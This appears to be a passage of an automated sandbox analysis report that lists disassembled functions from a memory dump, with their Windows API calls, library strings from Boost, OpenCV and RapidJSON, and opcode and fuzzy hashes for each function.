                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,00713988,00000000,00000000,8B56FF8B,0069CF1E,?,00000004,00000001,00713988,0000007F,?,8B56FF8B,00000001), ref: 006A713B
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006A71C4
                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 006A71D6
                                                                                                                                                        • __freea.LIBCMT ref: 006A71DF
                                                                                                                                                          • Part of subcall function 00697D9E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003), ref: 00697DD0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 2652629310-2802557318
                                                                                                                                                        • Opcode ID: 575e2d241a1a66a067c3a048e4d5e0d9a65b57bac82a9e6af8177521bf850164
                                                                                                                                                        • Instruction ID: 85c4a5839cce0b23b8e37a97d6ee6ddb6bfee712d87854a509c72638a2cf1c43
                                                                                                                                                        • Opcode Fuzzy Hash: 575e2d241a1a66a067c3a048e4d5e0d9a65b57bac82a9e6af8177521bf850164
                                                                                                                                                        • Instruction Fuzzy Hash: 3431BE72A0020AABDF25AF64DC45DEE7BEAEF41310F180269FC09DA250EB35CD55CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00422FF0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00579A51: __CxxThrowException@8.LIBVCRUNTIME ref: 00579A6B
                                                                                                                                                          • Part of subcall function 00579A91: __CxxThrowException@8.LIBVCRUNTIME ref: 00579AAB
                                                                                                                                                          • Part of subcall function 00579A91: std::regex_error::regex_error.LIBCPMT ref: 00579ABD
                                                                                                                                                          • Part of subcall function 00579A91: __CxxThrowException@8.LIBVCRUNTIME ref: 00579ACB
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004230AB
                                                                                                                                                          • Part of subcall function 004AA205: __EH_prolog.LIBCMT ref: 004AA20A
                                                                                                                                                        Strings
                                                                                                                                                        • stoll argument out of range, xrefs: 00423040
                                                                                                                                                        • stoull argument out of range, xrefs: 0042309B
                                                                                                                                                        • invalid stoll argument, xrefs: 00423036
                                                                                                                                                        • invalid stoull argument, xrefs: 00423091
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw$H_prolog$std::regex_error::regex_error
                                                                                                                                                        • String ID: invalid stoll argument$invalid stoull argument$stoll argument out of range$stoull argument out of range
                                                                                                                                                        • API String ID: 3593521065-1946835417
                                                                                                                                                        • Opcode ID: b3e2169955527ab97564677e75b59eec814bc091ef32460f4d80bf2d83d84926
                                                                                                                                                        • Instruction ID: a639a4b0519d944d2ec1176c502853b24eec4b0607276e1371c091c7d5fd27a1
                                                                                                                                                        • Opcode Fuzzy Hash: b3e2169955527ab97564677e75b59eec814bc091ef32460f4d80bf2d83d84926
                                                                                                                                                        • Instruction Fuzzy Hash: B521E872B00214BFEB14AB44EC46BAEB36DEF42722F10016EF90457601DBB56E0087F5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AB7FD, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AB802
                                                                                                                                                          • Part of subcall function 0041F0C9: __EH_prolog.LIBCMT ref: 0041F0CE
                                                                                                                                                          • Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: bind$listen$open$set_option
                                                                                                                                                        • API String ID: 3519838083-2803824588
                                                                                                                                                        • Opcode ID: fc41e1f4abedaa5be7b78a9d9fff143639876cde38e0153262eccc6e6a572b5c
                                                                                                                                                        • Instruction ID: 60cc2f46af1f607ce8064f9bcdf563aed8e6c223ac46b477335333a4d71b1311
                                                                                                                                                        • Opcode Fuzzy Hash: fc41e1f4abedaa5be7b78a9d9fff143639876cde38e0153262eccc6e6a572b5c
                                                                                                                                                        • Instruction Fuzzy Hash: E93177B1E00109AFDB14EF95D882AEEB7B9EF44714F10843EF514D7181E7749A85CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0051E2A2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __swprintf.LEGACY_STDIO_DEFINITIONS ref: 0051E33F
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0051E397
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw__swprintf
                                                                                                                                                        • String ID: %s$OpenCV Error: %s (%s) in %s, file %s, line %d$unknown function
                                                                                                                                                        • API String ID: 2877379683-3808662302
                                                                                                                                                        • Opcode ID: 1195b3e9435ee1e54b1fdbb347e83357923a8c5ea6e45cbb834458bf77966364
                                                                                                                                                        • Instruction ID: 24f399af4d63e0492ef292f94bb50414464faae7ceed8f4c11e01d7fe7cd6410
                                                                                                                                                        • Opcode Fuzzy Hash: 1195b3e9435ee1e54b1fdbb347e83357923a8c5ea6e45cbb834458bf77966364
                                                                                                                                                        • Instruction Fuzzy Hash: 7E31C4719006059FF728DB54DC0AEA67BBAFF45300B50095CE5528B5A2D7B1F9C1CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00425231, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00425236
                                                                                                                                                          • Part of subcall function 00424E50: __EH_prolog.LIBCMT ref: 00424E55
                                                                                                                                                          • Part of subcall function 00424E50: htonl.WS2_32(7F000001), ref: 00424EEF
                                                                                                                                                          • Part of subcall function 00424E50: htonl.WS2_32(00000000), ref: 00424F46
                                                                                                                                                          • Part of subcall function 00424E50: htonl.WS2_32(7F000001), ref: 00424F52
                                                                                                                                                        • new.LIBCMT ref: 004252E7
                                                                                                                                                        • new.LIBCMT ref: 004252FD
                                                                                                                                                          • Part of subcall function 00680AF7: Concurrency::cancel_current_task.LIBCPMT ref: 00680B0F
                                                                                                                                                          • Part of subcall function 00414AA6: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ABB
                                                                                                                                                          • Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ACD
                                                                                                                                                          • Part of subcall function 00414AA6: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B0F
                                                                                                                                                          • Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B21
                                                                                                                                                          • Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B86
                                                                                                                                                          • Part of subcall function 00414AA6: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B9C
                                                                                                                                                          • Part of subcall function 00414AA6: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414BAA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLasthtonl$CloseCreateEventH_prologHandle$Concurrency::cancel_current_task
                                                                                                                                                        • String ID: NSB$IA
                                                                                                                                                        • API String ID: 2183375162-1714093477
                                                                                                                                                        • Opcode ID: 01b522865fb8efc7fd11dca09108f628bccdf3ed7ca3d8dc7e146f4f8549739f
                                                                                                                                                        • Instruction ID: 97e3e356a5e110bbae6696401dea22d827379dba35d9c6740926647f0d94a568
                                                                                                                                                        • Opcode Fuzzy Hash: 01b522865fb8efc7fd11dca09108f628bccdf3ed7ca3d8dc7e146f4f8549739f
                                                                                                                                                        • Instruction Fuzzy Hash: CD31CFB0A01745EEE704DF69C545B89FFA4FF51304F10866EE058A7282C7B85A54CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004ADC44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: GetMembersPointer() != 0$IsObject()$data_.o.size > 0$m >= MemberBegin() && m < MemberEnd()
                                                                                                                                                        • API String ID: 3519838083-1829973892
                                                                                                                                                        • Opcode ID: a4efb8ceb23170acd5b4d505f392eaffd195ebf5fb0999bca14a830b648f0f8a
                                                                                                                                                        • Instruction ID: d85beb351cedf453b8bd51bfbf4da4e1c969620a48f7c75cc696a8d36cfde585
                                                                                                                                                        • Opcode Fuzzy Hash: a4efb8ceb23170acd5b4d505f392eaffd195ebf5fb0999bca14a830b648f0f8a
                                                                                                                                                        • Instruction Fuzzy Hash: 6E216BB2B00304A7EB20FF55DE82A6E735EEB61751F44053EF402436C2EB795E40C65A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AE76A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Getcvt$H_prologLocinfo::_std::_
                                                                                                                                                        • String ID: false$true
                                                                                                                                                        • API String ID: 312723928-2658103896
                                                                                                                                                        • Opcode ID: b02dc422e57031b3535addf4a5c667b77e441e545848b8f0d22cb8d1139ffc45
                                                                                                                                                        • Instruction ID: 949ef4dcd0b6bce0b0ce459e9c8ea2392efabcb6970d87e3ab5fd425250f439c
                                                                                                                                                        • Opcode Fuzzy Hash: b02dc422e57031b3535addf4a5c667b77e441e545848b8f0d22cb8d1139ffc45
                                                                                                                                                        • Instruction Fuzzy Hash: 2821B0B18003449FC721EFAAD841AAFBFF8EF56300F10852FE45597252D7349A05CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C6680, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005C66B2
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 005C66FB
                                                                                                                                                        • GetLastError.KERNEL32 ref: 005C6705
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectory$ErrorLast
                                                                                                                                                        • String ID: )K7~$boost::filesystem::current_path
                                                                                                                                                        • API String ID: 1128942804-3576661319
                                                                                                                                                        • Opcode ID: ddcd324dee24cce718f01fc56e29b8f85d000cff4577628fa69aca6197d53fae
                                                                                                                                                        • Instruction ID: 58de6259b278fae44209116a705dda5ce515993bf201b2b08e1a9a0e14031124
                                                                                                                                                        • Opcode Fuzzy Hash: ddcd324dee24cce718f01fc56e29b8f85d000cff4577628fa69aca6197d53fae
                                                                                                                                                        • Instruction Fuzzy Hash: 9211B271A01219AFDB04EFA4DC56F6FBBE8FB04754F40452EF806D72C1EB799A0486A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004B1912, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004B1917
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B197E
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004B19AF
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: ]sB$unexpected end of data
                                                                                                                                                        • API String ID: 281195438-1396046059
                                                                                                                                                        • Opcode ID: 46783c0619959fa227bf1ae2aa932e335c03a0ff92cdf43c7c96e04afb9f7fe5
                                                                                                                                                        • Instruction ID: 68e6c3820bfac509b40b235c4f341d15e4176986f668f6679be1e79896c8ef80
                                                                                                                                                        • Opcode Fuzzy Hash: 46783c0619959fa227bf1ae2aa932e335c03a0ff92cdf43c7c96e04afb9f7fe5
                                                                                                                                                        • Instruction Fuzzy Hash: 6311EFB1C042459FDB24DF68C0297AAFBF9EF24314F14858ED491973A2C3B90A05CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004C78C5, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004C78CA
                                                                                                                                                          • Part of subcall function 004A6580: __EH_prolog.LIBCMT ref: 004A6585
                                                                                                                                                          • Part of subcall function 004A6306: __EH_prolog.LIBCMT ref: 004A630B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: @5s$R8J$lL$|m
                                                                                                                                                        • API String ID: 3519838083-2046631033
                                                                                                                                                        • Opcode ID: c0dc73e4d4a233cec0616b76e7345daac501e3db89df453a229d016595fe2871
                                                                                                                                                        • Instruction ID: 23442ae073b739701650157c5e6858fca3355d897afdfec64d7bb90044f8f868
                                                                                                                                                        • Opcode Fuzzy Hash: c0dc73e4d4a233cec0616b76e7345daac501e3db89df453a229d016595fe2871
                                                                                                                                                        • Instruction Fuzzy Hash: 88115AB1B00A249FDB11DF68E98DA6ABBB1FB44314F10826ED51497351D3B84A058BC4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004B1890, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004B1895
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B18DE
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004B190C
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: ]sB$unexpected end of data
                                                                                                                                                        • API String ID: 281195438-1396046059
                                                                                                                                                        • Opcode ID: 8436d5d64c085b4e5975d4d7caa444e6e8faba723002e956a96cb5f5dc47cca9
                                                                                                                                                        • Instruction ID: 28003f3a82d923fbfebec6430535399792a7ce05a437f4428733450ed7ae290e
                                                                                                                                                        • Opcode Fuzzy Hash: 8436d5d64c085b4e5975d4d7caa444e6e8faba723002e956a96cb5f5dc47cca9
                                                                                                                                                        • Instruction Fuzzy Hash: 5F0192B1C043499FDB20EF64C0197EBBBF4AB04354F50865AD89063252D3790A058B95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004B1793, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004B1798
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B17DC
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004B180A
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: ]sB$unexpected end of data
                                                                                                                                                        • API String ID: 281195438-1396046059
                                                                                                                                                        • Opcode ID: f1c7a55ee33ee4d26536c07a98d0701b91f4e36793ed4c5e3b8c0de1c7cdda15
                                                                                                                                                        • Instruction ID: 2d672e01886c1d7e0604dcbb40f25a2efe4af2ca1d2d010918ed64cfe91d5dec
                                                                                                                                                        • Opcode Fuzzy Hash: f1c7a55ee33ee4d26536c07a98d0701b91f4e36793ed4c5e3b8c0de1c7cdda15
                                                                                                                                                        • Instruction Fuzzy Hash: C5018FB1D043499BDB20DF64C1297EFBBF8EF04364F50869AD89163382D7790A459B94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004B1810, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004B1815
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B1859
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004B188A
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: ]sB$unexpected end of data
                                                                                                                                                        • API String ID: 281195438-1396046059
                                                                                                                                                        • Opcode ID: dac8445dca53a7ff26b4dfb482ff05d5e2f6843fc6ad69035ce58efb63b7bf9d
                                                                                                                                                        • Instruction ID: bd1703f90d0bc2861500963252f7ea30ffbbd2942f73b5b912d4856f1ea328ab
                                                                                                                                                        • Opcode Fuzzy Hash: dac8445dca53a7ff26b4dfb482ff05d5e2f6843fc6ad69035ce58efb63b7bf9d
                                                                                                                                                        • Instruction Fuzzy Hash: 5D01BCB0C042499BCB20EFA8C0196AFBBF4EB04350F5085AED9A063382E7780A05CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00410B77, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 32COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: asio.ssl.stream error$stream truncated$unexpected result$unspecified system error
                                                                                                                                                        • API String ID: 3519838083-2829376187
                                                                                                                                                        • Opcode ID: de9d8fd7051e429d456dd5763d4d241555d8bf84ff351a934326fcdabac9abb0
                                                                                                                                                        • Instruction ID: c52cf6cd5b291364cfd55c7ebb1438d378ac92a48c039e73809839f1fe6799b5
                                                                                                                                                        • Opcode Fuzzy Hash: de9d8fd7051e429d456dd5763d4d241555d8bf84ff351a934326fcdabac9abb0
                                                                                                                                                        • Instruction Fuzzy Hash: DBF0B4B2998239DBD7109FDCD9119EABB68FB05704F00420BB805A2301C7F99AC08789
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004258C5, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004258CA
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 004258DE
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004258F4
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00425928
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00425951
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1633115879-0
                                                                                                                                                        • Opcode ID: 45d542f17fc25f910b7d54190d370e9922d85ef1c75a6e8389245df761c58c9a
                                                                                                                                                        • Instruction ID: 635df1c7be75a178799a10da7e940f2068e2ac44dcdc1def3dd9b0ebd143829b
                                                                                                                                                        • Opcode Fuzzy Hash: 45d542f17fc25f910b7d54190d370e9922d85ef1c75a6e8389245df761c58c9a
                                                                                                                                                        • Instruction Fuzzy Hash: 75113871E42955EBCB00EBA4E5547FEBB74EF11311F54000BE04163240C7780B49C7EA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00426206, Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0042620B
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0042621E
                                                                                                                                                        • new.LIBCMT ref: 0042623A
                                                                                                                                                        • new.LIBCMT ref: 00426255
                                                                                                                                                          • Part of subcall function 00680AF7: Concurrency::cancel_current_task.LIBCPMT ref: 00680B0F
                                                                                                                                                          • Part of subcall function 00414AA6: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ABB
                                                                                                                                                          • Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ACD
                                                                                                                                                          • Part of subcall function 00414AA6: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B0F
                                                                                                                                                          • Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B21
                                                                                                                                                          • Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B86
                                                                                                                                                          • Part of subcall function 00414AA6: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B9C
                                                                                                                                                          • Part of subcall function 00414AA6: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414BAA
                                                                                                                                                          • Part of subcall function 0041B4D3: CloseHandle.KERNEL32(?,?,00000000,?,00414E9E,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041B4E3
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00426297
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
